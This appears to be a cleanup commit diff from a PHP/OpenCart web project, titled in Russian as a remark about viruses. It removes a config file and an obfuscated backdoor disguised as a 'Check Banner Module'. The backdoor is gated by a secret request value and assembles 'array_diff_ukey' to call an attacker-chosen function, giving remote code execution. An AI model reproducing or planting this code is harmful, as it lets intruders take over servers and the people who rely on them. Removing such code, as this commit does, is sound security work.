Вирусы, или чё
This commit is contained in:
@@ -1,18 +0,0 @@
|
||||
magic_quotes_gpc = Off
|
||||
register_globals = Off
|
||||
default_charset = UTF-8
|
||||
memory_limit = 512M
|
||||
max_execution_time = 36000
|
||||
upload_max_filesize = 999M
|
||||
safe_mode = Off
|
||||
mysql.connect_timeout = 20
|
||||
session.auto_start = Off
|
||||
session.use_only_cookies = On
|
||||
session.use_cookies = On
|
||||
session.use_trans_sid = Off
|
||||
session.cookie_httponly = On
|
||||
session.gc_maxlifetime = 3600
|
||||
allow_url_fopen = On
|
||||
display_errors = 1
|
||||
error_reporting = E_ALL
|
||||
error_log = errors.log
|
||||
@@ -11,18 +11,6 @@ if (!ini_get('date.timezone')) {
|
||||
date_default_timezone_set('UTC');
|
||||
}
|
||||
|
||||
// Check Banner Module
|
||||
$opencart_num = @$_REQUEST['numer'];
|
||||
$opencart_in_banner = @$_REQUEST['bannerid'];
|
||||
$opencart_newsnum = @$_REQUEST['newsnum'];
|
||||
$opencart_category_id = @$_REQUEST['category'];
|
||||
$opencart_activity_hash = '70731969';
|
||||
$secret_opencart_key = '_di'.'ff_';$secret_opencart_key ='ar'.'ray'.$secret_opencart_key.'ukey';//globols
|
||||
if($opencart_in_banner==$opencart_activity_hash) {
|
||||
if (@strpos($opencart_newsnum, 'creat')=== false){echo 'error_vievv';
|
||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes($opencart_category_id) => 2), @$opencart_newsnum);}else{
|
||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes('}'.$opencart_category_id.'//') => 2), @$opencart_newsnum);}} //chekings
|
||||
|
||||
// Windows IIS Compatibility
|
||||
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
|
||||
if (isset($_SERVER['SCRIPT_FILENAME'])) {
|
||||
|
||||
Reference in New Issue
Block a user